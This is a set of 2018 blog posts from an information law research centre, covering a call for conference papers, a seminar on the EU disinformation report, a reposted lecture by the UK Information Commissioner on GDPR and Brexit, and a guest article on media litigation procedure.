Information Law & Policy Centre Blog

Information law and policy research at the Institute of Advanced Legal Studies

“The Internet: To Regulate or Not To Regulate” – ILPC written evidence

Tue, 12/06/2018 - 16:24

The ILPC has submitted written evidence in response to the recent call for evidence on ‘The Internet: To Regulate or Not to Regulate’ from the House of Lords Select Committee on Communications.

The written evidence outlines four key issues of internet regulation: the protection of human rights, the protection of freedom of expression, the use of deceased persons’ data, and the role of the UK as a world leader in internet regulation.

The publication is available to read here.


ILPC Annual Conference 2018 Call for Papers

Wed, 06/06/2018 - 14:59

CALL FOR PAPERS 

Transforming Cities with Artificial Intelligence: Law, Policy, and Ethics

We are pleased to announce this call for papers for the Information Law and Policy Centre’s Annual Conference on 23 November 2018 at IALS in London, this year supported by Bloomsbury’s Communications Law journal. You can read about our previous annual events here.

We are looking for high-quality, focused contributions that consider information law and policy in the context of using AI-based systems to improve the governance of cities in the public interest. Whether based on doctrinal analysis or empirical research, papers should offer an original perspective on the implications of algorithms and data-driven systems for improving the effectiveness of the public sector, whilst also ensuring that such processes are governed by frameworks that are accountable, trustworthy, and proportionate in a democratic society.

Topics of particular interest in 2018 include:

  • Explainability and transparency of algorithms
  • Smart cities
  • Data privacy and ethics
  • Internet of Things
  • Cyber security
  • Open data and data sharing
  • Public-private partnerships
  • AI and digital education
  • The EU General Data Protection Regulation


The conference will take place on Friday 23rd November 2018 and will include the Information Law and Policy Centre’s Annual Lecture and an evening reception.

The ILPC is delighted to announce that Baroness Onora O’Neill, a leading philosopher in politics, justice, and ethics, a Crossbench Member of the House of Lords, and an Associate Fellow of the University of Cambridge Leverhulme Centre for the Future of Intelligence (CFI), will deliver this year’s Annual Lecture.

Attendance will be free of charge thanks to the support of the IALS and our sponsors, although registration is required as places are limited. Registration for the Annual Conference is available here.

The best papers will be featured in a special issue of Bloomsbury’s Communications Law journal, following a peer-review process. Those giving papers will be invited to submit full draft papers to the journal by 1st November 2018 for consideration by the journal’s editorial team.

How to apply:

Please send an abstract of 250–300 words and brief biographical information to Eliza Boudier, Fellowships and Administrative Officer, IALS (eliza.boudier@sas.ac.uk) by Friday 13th July 2018 (5pm BST).

Abstracts will be considered by the Information Law and Policy Centre’s academic staff and advisors, and the Communications Law journal editorial team.

About the Information Law and Policy Centre at the IALS:

The Information Law and Policy Centre (ILPC) produces, promotes, and facilitates research on the law and policy of information and data, and the ways in which law both restricts and enables the sharing and dissemination of different types of information.

The ILPC is part of the Institute of Advanced Legal Studies (IALS), which was founded in 1947. It was conceived, and is funded, as a national academic institution, attached to the University of London, serving all universities through its national legal research library. Its function is to promote, facilitate, and disseminate the results of advanced study and research in the discipline of law, for the benefit of persons and institutions in the UK and abroad.

About Communications Law (Journal of Computer, Media and Telecommunications Law):

Communications Law is a well-respected quarterly journal published by Bloomsbury Professional covering the broad spectrum of legal issues arising in the telecoms, IT, and media industries. Each issue brings you a wide range of opinion, discussion, and analysis from the field of communications law. Dr Paul Wragg, Associate Professor of Law at the University of Leeds, is the journal’s Editor in Chief.

ILPC Seminar: EU Report on Fake News and Online Disinformation, 30th April 2018

Wed, 09/05/2018 - 12:36


The term “fake news” has become a prominent fixture of public discourse. Indeed, the idea of “fake news” has brought to the fore a number of key concerns of modern global society, including whether and how social media platforms should be regulated and, more critically, the potential of online disinformation (and its spread on such platforms) to undermine democracy and the work of democratic institutions.


In response to the growing concerns over “fake news” and online disinformation, the European Union established an independent High Level Expert Group (HLEG) in early 2018 to develop policy recommendations to counter online disinformation. In March 2018, the HLEG published a report entitled ‘A Multidimensional Approach to Disinformation’, which sets out a series of short- and longer-term responses and actions for various stakeholders, including media practitioners and policymakers, to consider in formulating frameworks to address these issues effectively. The report recognises that online disinformation is a complex and multifaceted issue, but also a symptom of the broader social move toward globalised digitalism.


The Information Law and Policy Centre (ILPC) at the Institute of Advanced Legal Studies, University of London, convened a seminar at the end of April to discuss the HLEG’s report and the phenomenon of “fake news”. The seminar forms part of the ILPC’s public seminar series, in which contemporary issues in information law and policy are discussed and deliberated with key stakeholders and experts in the field. Held on the evening of 30th April 2018, the seminar consisted of an expert panel of discussants from both academia and the media.


Chaired by ILPC Director Dr Nóra Ni Loideain, the panel included Professor Rasmus Kleis Nielsen, Professor of Political Communication at the University of Oxford, Director of Research at the Reuters Institute for the Study of Journalism, and a member of the HLEG; Dr Dimitris Xenos, Lecturer in Law at the University of Suffolk; Matthew Rogerson, Head of Public Policy at Guardian Media Group; and Martin Rosenbaum, Executive Producer, BBC Political Programmes.


After an introduction and overview of the report by the Chair, Professor Nielsen (speaking in his personal capacity) began the panel discussion by noting that “fake news” is part of a broader crisis of confidence between the public, press and democratic institutions. Professor Nielsen cautioned against the use of the term “fake news”, highlighting that it is dangerous and misleading, having been sensationalised for political use. Stressing that the HLEG took deliberate steps to curb the further popularisation of the term by not using it in reports and policy documents, he also pointed out that significant steps to redress the issue cannot be taken until we have a deeper understanding of just how widespread the problem is or is not. That being said, Professor Nielsen emphasised that in addressing such issues we must start from the principles we seek to protect, particularly freedom of expression and open democracy.


Accordingly, Professor Nielsen set out what he saw as the six key recommendations from the HLEG’s report, noting that these recommendations come as a package to be realised and implemented together:

  • Abandon the term “fake news”;
  • Set aside funding for independent research in order to develop a better understanding of the scope and nature of the issue, noting too that little is known about the issue outside of the West and Global North countries;
  • Call for platform companies to share more data with fact-checkers, albeit in a privacy-compliant manner;
  • Call for public authorities at all levels to share machine-readable data to better enable professional journalists and fact-checkers;
  • Invest in media literacy at all levels of the population; and
  • Develop collaborative approaches between stakeholders.


Our second discussant, Dr Xenos, offered a light critique of the HLEG’s report. He agreed with the group’s focus on ‘disinformation’ relating to materials and communications that can cause ‘public harm’, and with its contextual targets involving parliamentary elections and important ‘sectors, such as health, science, finance’, etc. He pointed out that, as the institutions of power (such as the EU’s organs) are very often the original sources of information that is subsequently covered by various media organisations and communicative platforms, the same standards and safeguards should apply to the communications and materials produced and published by those institutions. Dr Xenos referred to his own contribution and to recent reports of the EU Ombudsman, involving the EU Commission, the EU Council and their very wide range of experts, which highlight serious deficiencies in decision- and policy-making, undermining the basic democratic safeguards which the HLEG’s report targets, such as transparency, accountability, avoidance of conflicts of interest, and access to relevant information.

In this respect, Dr Xenos argued that the proposal for a fact-checking system of media communications covering the decisions and policies of the institutions of power is unrealistic when such a system and safeguards do not apply to the original communications, materials and decisions of these institutions that the media may (if and when) subsequently cover. He emphasised the need for independent academic insight that can offer analysis of events ex ante, in contrast to the traditional ex post analysis of journalism. However, Dr Xenos also said that the role of academics is undermined if appropriate research focus is lacking or there is a conflict of interest – an issue which, he believes, also concerns those media organisations and platforms controlled by private corporations. In support of his claims, he referred to a recent study and its subsequent coverage by both the UK and US media. He welcomed the HLEG’s suggestions for access to and analysis of platforms’ data and for algorithmic accountability in the dissemination of information.


Responding to Dr Xenos, Dr Ni Loideain noted that the report consistently emphasised the need for evidence-based decision- and policy-making.


Following from Dr Xenos’ remarks, Matt Rogerson from the Guardian Media Group emphasised the critical role online disinformation can play in determining the outcome of elections. Matt noted that current politics are decided at the margins, with over a hundred constituencies won or lost on swings of under 10% – margins which Facebook, for example, can greatly influence, given the high number of people who get their news updates only from this source. Matt noted, too, how in the wake of the Cambridge Analytica scandal, tech companies are becoming increasingly hesitant to be open about their policies and activities. Matt further highlighted that citizens’ knowledge and understanding of the various news agencies and news brands vary, pointing to a study which demonstrated that citizens placed greater trust in the news items offered by certain broadsheet newspapers than in those of particular tabloids.


Recognising, therefore, that there is strong media diversity and pluralism of news brands at present, Matt spoke of how this must be preserved and protected. One important issue, Matt noted, was the need for stronger visual cues on platforms such as Facebook, so users could readily distinguish the branding of Guardian news items from that of other, less trusted news sources. Matt also raised concerns about the impact of programmatic digital advertising, which effectively decouples brand advertising from the context in which it is seen via online platforms, reducing the accountability of the advertiser as a result.


In terms of how to create trust between news organisations and the wider public, Matt drew our attention to the importance of diversity within media houses and social media platforms. Highlighting the lack of gender and ethnic diversity within the tech industry, as well as the related monopoly of Silicon Valley companies over the industry as a whole, Matt noted that the effect of this was little competition between platforms to raise standards and do the right thing by society. Matt recommended revisiting competition regulation to drive competition and diversity.


Martin Rosenbaum from the BBC, speaking in his personal capacity, was the final discussant to offer a response to the report. Martin echoed the sentiments of Matt and Professor Nielsen in cautioning against downplaying the issue of disinformation and the effect it can have on society. Martin noted that disinformation can occur in various forms, including users sharing information despite not knowing or caring whether it is true. Moreover, Martin emphasised how disinformation more broadly can erode trust in reputable news agencies and public institutions by generating, as Professor Nielsen also observed, a general crisis of truth.


Martin additionally mentioned how the ready, undifferentiated consumption of news on Facebook represents a divorce between the source of the information (for example, the BBC) and the way in which it is distributed and reaches the consumer. Martin explained how this works to undermine the trustworthiness of certain kinds of media and information.


In speaking of mechanisms through which to counter disinformation, Martin noted the BBC’s code of journalism that is accurate, fair and impartial, which underpins its position as one of the most trustworthy news sources globally. He further noted how the BBC has put in place various accountability mechanisms to handle complaints effectively. Martin additionally spoke of the need for media literacy and for involving younger generations in news-making, reporting, and spotting “fake news”.


Responding to the claims made earlier by Dr Xenos, Martin countered that specialist journalists are most often best placed to fact-check news stories. And lastly, Martin also pointed out that chat apps are complicit in the dissemination of “fake news” items, and that these platforms are much harder to regulate and monitor in terms of the content they handle.


Following from Martin’s contribution, the discussion opened up and various questions were posed to the panel regarding the scope and definition of disinformation and how this issue overlaps with the fundamental principle of freedom of expression. There was a broad consensus to steer away from unnecessary government regulation that may impact upon free speech. Other issues raised included the tension between the call for open data and data sharing and the coming into effect of the GDPR this month.

Dr Rachel Adams, ILPC Early Career Researcher

Money, law and courage: the varied roles of the UK Information Commissioner

Wed, 18/04/2018 - 11:49

This post is re-posted from the ICO’s website with kind permission. Original web entry available here

Original script may differ from delivered version

Elizabeth Denham delivered the CRISP (Centre for Research into Information, Surveillance and Privacy) annual lecture 2018 at the University of Edinburgh on 14 March.

She spoke about the many roles she must play as UK Information Commissioner and set out the challenges and opportunities ahead.

Introduction

Many thanks for the invitation to speak today. I have a connection with CRISP and William Webster, Kirstie Ball and Charles Raab that predates my time in the UK – the British Columbia OIPC is a partner in the Big Data Surveillance Project with David Lyon and others in Canada. I have long been aware of the importance of the CRISP doctoral training school.

One of the wonderful aspects of privacy and data protection is the extremely rich and interdisciplinary scholarly research community.

Data Protection raises questions of law, politics, sociology, computer science, communications studies, business and management, psychology, urban studies, geography, and so many other areas of scholarship.

For all the regulatory and legal challenges, privacy and data protection continue to raise fascinating intellectual issues.

CRISP is a wonderful model of interdisciplinary research and training for young researchers.

I am very glad to have received the support of the broad and vibrant academic community involved in research on privacy and surveillance since taking up this job.

I am also proud to have launched a new program to fund independent research and help consolidate the network of privacy researchers in the UK.

I am hopeful that this will continue for many years.

Money, law, courage

The title – Money, Law and Courage – signifies, of course, that the contemporary data protection authority (DPA), of which the ICO is the largest in the world in terms of personnel and budget, cannot do its work without a clear legislative framework, the necessary technical and financial resources, and the courage to do our jobs well. My office is responsible for the effective enforcement of no fewer than eleven statutes and regulations.

They say: “Money makes the world go around . . .”

Well, we have a budget of £24 million; following the introduction of the new funding model, this will be £34m in 2018/19. We’ve been busy over the last year recruiting more staff and currently have a headcount of around 500.

We expect staffing numbers to continue to increase, passing 600 by 2019 and reaching approximately 650 FTE during 2019/20.

We will be assessing demand as the GDPR goes live and beyond, adjusting our plans accordingly. To give you a sense of how we are fixed now, we’ve got around 200 case-workers working on issues raised by the public, a 60-strong enforcement department taking forward our investigations, and a similar number charged with developing our information rights policies and engaging with the stakeholders and organisations that need to implement them.

Coming from an office of under 40 in British Columbia, I find the scale of the management task here far more complex and challenging.

Expectations

I had – I have – Great Expectations for this job.

But there’s one aspect of the job that I did not expect, and it stems from the very governance structure of the ICO.

My job combines the role of Commissioner, which has a variety of regulatory and quasi-judicial functions, with that of a CEO. It is based on the “Corporation Sole” Model.

That’s highly unusual for a large regulatory body like the ICO.

The implications of this model are that I perform a wide range of management functions in my capacity as the ICO’s CEO.

I would say that as well as my regulatory role, I must also work alongside my excellent staff on administrative duties involving organisation, finance, human resources, and negotiations with the unions.

Much activity of late has been about recruitment and retention issues. I am pleased to report that the Treasury has given me pay flexibility to address the gap in wages when compared to the external market.

Everyone is looking for data protection expertise.

I am also looking at new ways to bring in talent – through secondments from the private and government sectors, and through technology fellowships for post-doctoral experts. 

Toolbox

It’s not just about the money, it’s also about the resources. And I have many tools in the toolbox. 20 years ago, the toolbox was not global.

Now there is a common recognition that all DPAs need to make creative use of all the tools in the toolbox.

And as in a toolbox, each tool (the hammer, the drill, the screwdriver, the chisel) is suited to a different purpose.

But most of these tools can be used separately, not in conjunction with one another. Throw away the screwdriver or the drill, and the hammer still remains and is still capable of driving in the nail.

At the same time, it cannot drill the hole, or screw in the screw – assuming, of course, that the user can tell the difference.

For the person with the hammer, everything can tend to look like a nail, right?

The tools in the privacy toolbox, however, are designed to be used in conjunction with one another. They do form an integrated package, all of which are now necessary and none sufficient on their own.

Of course the tools are all for nothing if the Commissioner and her team don’t have a good plan for what we are building and why.

The Law

So now to the law. This global repertoire of instruments is reflected in the General Data Protection Regulation (GDPR), which will apply in the UK from May: privacy by default and design; codes of practice; privacy seals; Data Protection Impact Assessments (DPIAs); data protection officers; and accountability mechanisms for good privacy management.

The Europeans have made vigorous efforts to learn from abroad and to embrace policy instruments that were pioneered in other countries, such as Canada, and to incorporate them into the GDPR.

Positive results in data protection are not just attributable to decisions from the top.

They are “co-produced” by a widespread network of actors (regulators, businesses, consumer organisations, media, researchers, and individuals).

I see the ICO as the facilitator of this network, a convener as much as the regulator.

My varied roles

Over ten years ago, Charles Raab and Colin Bennett published The Governance of Privacy: Policy Instruments in Global Perspective [1].

In that book, they defined the contemporary roles of the DPA as: ombudspersons, auditors, consultants, educators, policy advisers, negotiators, enforcers, and international ambassadors.

Different authorities played these roles in different ways and with shifting emphasis over time. I, and my staff, also play these roles.

Data Protection “Ombudsman”

Any DPA has to be attentive to its main clients – the citizenry who may have concerns and questions about how their personal data is captured and processed.

We all play the classic role of the “ombudsperson.”

Demand for this role is high and increasing. In 2016-17, the ICO received and dealt with over 18,000 data protection complaints, 90% of which were resolved within three months of receipt.

This year we will be over the 21,000 mark and next year we expect over 24,000 complaints as people become more aware of their rights.

Prominent concerns include complaints about timely and comprehensive access to personal information, about the use of CCTV, and about take-down requests from search engines. We are dealing with a wide range of complaints; most relate to general business, including the financial and insurance sectors, but they also cover the important relationship and services between the state and the citizen, including local and central government, health, policing and education.

Auditor

The auditing role is central, and will become more so under GDPR. That embraces more proactive assessments of organisational accountability and expands our work to the private sector in a way not seen before. But we now also have a more nuanced understanding of what a data protection audit actually entails, and make important distinctions between full-blown audits, risk reviews and advisory audits.

In 2017-18, we delivered 24 full audits providing advice and recommendations, 37 information risk reviews, 18 follow-up audits, and 47 advisory audits to SMEs.

Consultant

We are also consultants and often give advice to organisations that come to us with requests to comment on new products and services.

We are happy to hear of new developments and to give advice about whether new systems are compliant with the law, and about how to minimize risks to privacy. This role too will increase under the GDPR – organisations will be increasingly pressured to get the advice of regulators before systems are developed and services are launched.

They will be expected to implement privacy by design, and by default, and will need advice about how to accomplish those goals.

In this regard, my office is establishing a regulatory “sandbox” that provides beta testing of new initiatives in private and public sectors.

This strategy allows us to keep up with new technological developments, and at the same time ensure that appropriate protections and safeguards are built in.

This is what the law requires.

The strategy is based on the strong belief that privacy and innovation are not mutually exclusive. New technology is both a risk and an opportunity. The strategy also allows us to boost the technical expertise of our staff.

Educator

I spend a lot of my time in education – both of the general public and of organisations. We have launched a guide to the GDPR, which has had over 3 million hits since publication.

I have given several dozen speeches to organisations over the last two years, and use those as an opportunity to spread the word to key audiences. We are also active in social media, and broadcast podcasts on significant questions. I also write blogs on key issues – including a series of GDPR myth busting blogs.

In April, we will launch a public education campaign, Your Data Matters, to educate the public on their new rights under the law.

The campaign is the ICO’s but we are collaborating with private sector and civil society partners to assist us in disseminating information about the use of personal data in everyday life, complete with real-life scenarios and story-telling content. The aim is to increase the public’s trust and confidence in how organisations use their data. And that’s my priority.

Policy Adviser 

With the GDPR, and Brexit, I have spent a lot of time with parliamentary committees and ministerial staff, giving policy advice about legislative and regulatory change. I have spent around 2–3 days a week in London since I took up the position because of heavy parliamentary and Whitehall business. We have opened a London office and formed a parliamentary team.

Negotiator

My staff and I need strong negotiation skills: staking out principled positions, but being prepared to compromise. We negotiate with government agencies, and with corporations. We negotiate, for instance, over codes of practice, such as the one currently being developed on direct marketing. The role of negotiator is critical in an area of law where there are often no clear black and white answers, and few “bright-line” rules.

We are also involved in negotiation with other regulators and oversight agencies. There are many other players in this space – from the NCSC in matters of cyber security and the Surveillance Camera Commissioner to the Children’s Commissioners. In fact, I met with Bruce Adamson, the Children and Young People’s Commissioner for Scotland, just this morning.

We work hard to develop a framework that allows us to work in a co-ordinated manner in the best interest of UK citizens.

I played all those roles in Canada (in Ottawa and in British Columbia). But they are now played out on a bigger stage, and with far greater implications.

There are two roles I’ve yet to speak about – the enforcer and the international ambassador.

These are far more prominent in my role as UK Information Commissioner than they ever were in Canada. And these are the ones that I would like to discuss in greater detail in the rest of this talk.

Enforcement

My office possesses a greater range of enforcement and sanctioning powers than those in Canada.

As an illustration, companies could find themselves subject to severe penalties for not complying with the GDPR, which sets the maximum amount that companies could be liable for at £17m, or 4% of the organisation’s total annual worldwide turnover in the preceding year, whichever is higher.

We also have powers to suspend or amend processing or transfers.

The enforcement notice can be more intrusive than the fine. These are significant fining and directing powers, and they have to be used predictably, consistently and judiciously.

To that end, my office is developing a Regulatory Action Policy to provide greater clarity and focus to our roles.

So, when I look at the contemporary inventory of regulatory tools at my disposal, it is now a long list that operates on a sliding continuum, or hierarchy of regulatory action.

That’s quite a list, right?

We aspire to select the most appropriate regulatory instrument based on a risk assessment of the nature and seriousness of the breach, the sensitivity of the data, the number of individuals affected, the novelty and endurance of the concerns, the larger public interest, and whether other regulatory authorities are already taking action in respect of the matter.

We also reserve the right to take into account the attitude and conduct of the organisation, whether relevant advice has been heeded, and whether accountability measures have been taken to mitigate risk.

Now might be a good time to tell you about our ongoing investigation into the use of personal data by political parties and campaigns. The use of data analytics for political purposes has not been examined by any other DPA.

It is a complex investigation involving over 30 organisations including political parties, data analytics companies, and social media platforms.

We hope to shed light on the mysteries and complexities of the data-driven campaign and election. And we hope that our work will be an important contribution to the wider legal and ethical discussions about the use of personal data to mobilize voters.

International

All privacy and data protection commissioners are increasingly international ambassadors for their domestic data protection regimes and approaches.

We advance the interests of our citizens, and also to some extent our businesses, in a variety of regional and international forums.

As UK Information Commissioner, I am now of course on a far more visible international stage than I ever was in Canada.

To help navigate these uncertain international waters, my office has published an international strategy that recognizes the importance of agility in an ever-changing world.

As you know, the GDPR will apply in the UK as of May 25th 2018. We have been giving guidance to British businesses on how to comply with the GDPR, on issues such as automated decision-making, profiling, personal data breach notification, and the processing of data on children.

We have also tried to explode some of the unfortunate myths concerning compliance.

As we have longer-standing experience with some of the instruments in the GDPR, we hope that our practical guidance can have an influence beyond the UK.

At the same time, we have been trying to influence the new Data Protection Bill, which had its Second Reading debate in the Commons last week, and which aims to align UK law with the GDPR.

Overall, I am encouraged that the interests of the government, UK industry and civil society are broadly aligned around the need to apply the provisions of the GDPR within the UK with minimum divergence. The government has prioritised the issue of data protection and data flows in the Brexit negotiations because data underpins the digital economy, trade and criminal justice.

I am striving for what I have called a “holy trinity of outcomes”: uninterrupted data flows to Europe and the rest of the world; high standards of data protection for UK citizens and consumers, wherever their data resides; and legal certainty for business.

Brexit

We intend to play a full role in EU institutions until the UK leaves the EU, and we are preparing for the post-Brexit environment in order to ensure that the information rights of UK citizens are not adversely affected.

But several questions remain, which will inescapably be determined by the final contours of the relationship between the UK and the European trading bloc. There is agreement that there will be a transition period – necessary to untangle a 40-year regulatory regime. During the transition period, to avoid a cliff edge harmful to business and citizens, the intent is that the regulatory regimes – from data protection to aviation, food standards and the environment – will be maintained.

When it comes to post-Brexit arrangements for international transfers, a bespoke agreement on data flows in the commercial and security sectors, or an adequacy finding from the European Commission, may be the most elegant ways of ensuring the continued frictionless flow of data between the EU and the UK.

And there is no doubt that having domestic laws that achieve a high standard of data protection, harmonized with those of the EU, will be a significant advantage in a special arrangement.

Should the UK leave the EU without a data deal in place, EU organisations will need to have binding contractual arrangements in place every time they wish to share new information and data with their UK partners.

Even with the GDPR translated into UK law, interpretation of the law is the responsibility of the ICO and the UK courts.

Our interpretation might be influenced by decisions made through consistency mechanisms within the GDPR and the European Data Protection Board, but there is no guarantee – leading to possible divergences of interpretation and confusion for companies that do business in the UK and the EU.

Perhaps the most significant “unknown” from my point of view is the exact nature of relationship with our DPA colleagues across Europe.

Is the ICO going to have a seat on the European Data Protection Board with voting rights or will we be an observer without voting rights; or not even allowed to have a seat around the table? Is the UK going to be a partner, helping to set policy, or will we have the status of a third country – like Canada or Japan?

And then there is the “onward transfer” problem of how to protect the data of EU citizens exported from UK organisations to other areas of the world, which will be a critical issue in the determination of adequacy. Will the UK have a mirror agreement, similar to that currently enjoyed by Switzerland? Or will UK businesses have to default to various accountability mechanisms, such as binding corporate rules?

And what, then, of data flows from the UK to the United States? Will there be a separate UK-US Privacy Shield arrangement?

There is uncertainty over the legal arrangements in the transition period and the repercussions of this unprecedented process, but the one certainty is that the European Union will continue to advance the highest standards of protection for the personal data of people in the EU, and the UK shares and has committed to maintain these high standards.

I expect that when it comes to rights such as the right to privacy and data protection, the EU and the UK will continue to pursue common strategies; and I expect to maintain substantial dialogue and work with my EU colleagues. The ICO is the largest DPA in Europe and contributes heavily to the work of the Article 29 Working Party. Its influence should, and will, continue to be felt post-Brexit.

Courage

But none of those resources, legal tools and relationships are sufficient, unless the Commissioner has the courage of leadership and inspires teamwork to advance the rights of UK citizens in the face of some strong global, technological and organisational pressures. But courage is not just manifested in enforcement – in using the legal powers of the office to punish and sanction.

It is also a matter of hard work, commitment, perseverance and a skill in knowing what instrument to use, at what time.

Any data protection or privacy Commissioner has to be pragmatic, and be aware of the various policy tools and instruments at his or her disposal. At a superficial level, the job does involve knowing when to use the ‘carrot’ or ‘the stick’. But those choices are now more complex.

So that simple distinction may be misleading – there are now many types of ‘carrot’ and many types of ‘stick’.

At the end of the day, all privacy and data protection commissioners are looking for an ounce of prevention.

That has been generally argued by observers of the work of privacy commissioners, going back to David Flaherty’s pioneering 1989 book, Protecting Privacy in Surveillance Societies [2].

Offices like mine, like the ICO, are more effective when they can act proactively and give general policy guidance to minimize the need for complaints and enforcement actions.

Prevention is better than cure.

But this is a goal that is not easy to realise, when the office is continually expected to respond to the unexpected: the data breach, the high-profile media story, the sudden policy initiative from government, the significant court decision and so on.

We do try to operate an intelligence function that gathers data on the implementation of data protection, surveys companies and monitors practices.

We have a new team that focuses on priority files, and these cases, investigations or audits are run by cross-office groups directed by the senior leadership team. We are then able to understand any general patterns and take proactive measures accordingly.

We also work with civil society and consumer groups – and take their complaints about systemic issues.

GDPR will give us more tools for education, for encouraging accountability, for building in privacy by design and by default. Of course, it is essential to keep the legal sanctions in the background, be ready to use them, and make organisations aware that we are ready to use them.

That general conclusion about the importance of the proactive and general policy work, over the more reactive enforcement work, was also true of my work in Canada and BC.

It is just that I now have more money, more staff, more laws, more tools in my toolbox, a larger audience, a brighter media spotlight and a more extensive range of organisations to regulate.

So, I have the resources to do the job and the law to back me up.

I’ll let you be the judge as to whether I and my team have the courage!

References

[1] C.J. Bennett and C.D. Raab, The Governance of Privacy: Policy Instruments in Global Perspective (Cambridge, MA: MIT Press, 2006).

[2] D.H. Flaherty, Protecting Privacy in Surveillance Societies: The Federal Republic of Germany, Sweden, France, Canada and the United States (Chapel Hill: University of North Carolina Press, 1989).

Event: Joining The Circle: capturing the zeitgeist of ‘Big Tech’ companies, social media speech and privacy

Mon, 09/04/2018 - 11:40

Professor Robin Barnes (Global Institute of Freedom and Awareness) and Peter Coe (Aston University) have organised a panel session at the Inner Temple, London, on Wednesday 23 May 2018. The session is entitled: ‘Joining The Circle: capturing the zeitgeist of ‘Big Tech’ companies, social media speech and privacy’.

It is based on Dave Eggers’ book, The Circle, which tells the story of an all-powerful new media company that seeks to totally monopolize its marketplace and remake the world in its image. Although fictional, the book captures the zeitgeist surrounding ‘Big Tech’ companies exerting ever-increasing influence over our lives by altering our perceptions and expectations of the media (including citizen journalists), free speech and privacy, and how our personal information is used and protected.

The panel consists of seven experts from academia and practice who are currently engaging with these issues: Peter Coe; Professor Barnes; Dr Paul Wragg and Rebecca Moosavian (both University of Leeds); Dr Paul Bernal (University of East Anglia); Dr Laura Scaife (BBC); and Jacob Rowbottom (University of Oxford). Professor Ian Cram (University of Leeds) will open the conference. These experts will present and discuss their thoughts on these issues, and their potential implications, both now and in the future.

This event will be of interest to practising and academic lawyers with expertise in Media Law generally (including free speech, privacy and data protection), journalists and other media professionals, and those engaged in research and teaching relating to journalism and the wider media.

The event is free to attend, and includes lunch and refreshments. Registration will begin at 9.00am and the panel will finish at around 4.00pm. Following the close of the panel session there will be an opportunity to network with the panel members and other delegates.

Delegate places are limited and are therefore available on a first-come, first-served basis. If you would like to attend, please email Peter Coe as soon as possible: p.coe@aston.ac.uk.


New approach to media cases at the Royal Courts of Justice is a welcome development

Mon, 09/04/2018 - 11:24

Guest post by Dr Judith Townend.

This is an edited version of an article which first appeared in Communications Law journal, volume 23, issue 1 (Bloomsbury Professional) and PA Media Lawyer.

In 2012 Mr Justice Tugendhat, ahead of his retirement in 2014, made a plea for more media specialist barristers and solicitors to consider a judicial role: “As the recruiting posters put it: Your country needs you.”

He emphasised the particular burden of freedom of expression cases, which require judges, for example, to consider the rights of third parties, “even if those third parties choose not to attend court” and to provide reasons for the granting of injunctions at very short notice.

Without expert knowledge of the applicable law, this is no easy task. Fortunately, media law cases have not fallen apart with the respective retirements of Sir Michael Tugendhat and Sir David Eady, and recent specialists to join the High Court include Mr Justice Warby in 2014, and Mr Justice Nicklin in 2017 – both formerly of 5RB chambers.

The arrival of Mr Justice Warby, who was given the newly created role of Judge in charge of the Media and Communications List, has provided a welcome opportunity to propose changes to the procedure of media litigation in the Queen’s Bench Division, where the majority of English defamation and privacy claims are heard.

Since taking on responsibility for cases involving one or more of the main media torts – including defamation, misuse of private information and breach of duty under the Data Protection Act 1998 – Mr Justice Warby has spoken about his hopes and plans for the list, and has also conducted a consultation among those who litigate in the area, as well as other interested parties.

The consultation considered the adequacy of Civil Procedure Rules and Practice Directions; the adequacy of the regime for monitoring statistics on privacy injunctions; and support for the creation of a new committee.

As a socio-legal researcher rather than legal practitioner, my interest was piqued by the latter two questions.

For some time, I have been concerned that efforts by the Judiciary and the Ministry of Justice to collect and publish anonymised privacy injunction data have been insufficient, and also that the availability of information about media cases could be improved more generally.

My own efforts to access case files and records in 2011-13, to update research conducted by Eric Barendt and others in the mid-1990s and to interrogate assertions of defamation’s “chilling effect”, proved largely unsuccessful, and I was astonished at how rudimentary and paper-based internal systems at the Royal Courts of Justice appeared to be.

Although public observers are entitled to access certain documents – such as claim forms – the cost and difficulty in locating claim numbers prohibits any kind of useful bulk research which would allow more sophisticated qualitative and quantitative analysis of media litigation.

I jumped, therefore, at the opportunity of the consultation to raise my concerns about the injunctions data, and to support the creation of a new user group committee.

My submission, with Paul Magrath and Julie Doughty, on behalf of the Transparency Project charity, made suggestions for revising the injunctions data collection process, including the introduction of an audit procedure to check information was being recorded systematically and accurately.

Following the consultation, Mr Justice Warby held a large meeting at the Royal Courts of Justice for all respondents and other interested parties at which he shared a table of proposals from the consultation, provisionally ranked as “most feasible”, “more difficult” and “most difficult”.

The last category also included proposals which would require primary legislation, which would be a matter for Parliament rather than the Judiciary.

I was pleased that our initial proposals on the transparency of injunctions data have been deemed practical and feasible in the first instance.

Also considered achievable are some of the proposals related to case management and listings, updating the pre-action protocol (PAP), the Queen’s Bench Guide, and civil practice directions in light of developments in privacy, data protection and defamation litigation and press regulation (not least to reflect the Defamation Act 2013).

This meeting also established the creation of a new Media and Communications List User Group (MACLUG) to which a range of representatives have been appointed.

The group comprises members of the Bar and private practice solicitors (including both claimant and defendant specialists), in-house counsel, clerks, and a costs practitioner.

Additionally, I have joined as a representative of public interest groups – i.e. those engaged in academic research and third sector work. The new committee met for the first time at the end of 2017, and members have formed smaller working groups to take forward the “feasible” proposals, which will be discussed with our respective constituencies in due course and, where relevant, eventually proposed to the Civil Procedure Rule Committee for consideration.

In a speech to the Annual Conference of the Media Law Resource Center in September last year, Mr Justice Warby identified his overall aims for the “big picture” and landscape of media litigation: to resolve disputes fairly, promptly, and at reasonable cost.

All of which were “easier said than done”, in his words. Quite so. But it is right that it should be attempted, and with judicial input where appropriate.

Mr Justice Warby’s efforts to date are to be applauded, and in particular, his open approach in addressing some of the flaws and inconsistencies of current practice, and evaluating structural and systemic issues.

That said, a committee formed by the judiciary is constrained in its remit, quite rightly. The consideration of changes to primary legislation should fall to Parliament.

It is therefore important that media law practitioners and other stakeholders should also work with the Ministry of Justice and HM Courts and Tribunals Service to inform ongoing work on courts modernisation, and push for wider consultation and involvement in reforms. A further challenge is to persuade government and parliamentarians to take on any issues requiring changes to legislation.

Part I of the Leveson Inquiry, addressing in part the relationship between media proprietors, editors and politicians, showed that the process of consultation on public policy affecting the news media has been subject to undue influence by certain private interests, and insufficiently transparent.

To this end, perhaps the new Lord Chancellor and Secretary of State for Justice, David Gauke MP, and the new Secretary of State for Digital, Culture, Media and Sport, Matt Hancock MP, might consider ways in which they can consult more openly and fairly in their development of policy and draft legislation on freedom of expression, reputation and privacy.

Dr Judith Townend is lecturer in media and information law at the University of Sussex and a member of the Queen’s Bench Division Media and Communications List User Group Committee.

Featured image: courtesy of Dave Pearce (@davebass5) on Flickr.

LSE Experts on T3: Omar Al-Ghazzi

Mon, 09/04/2018 - 10:47

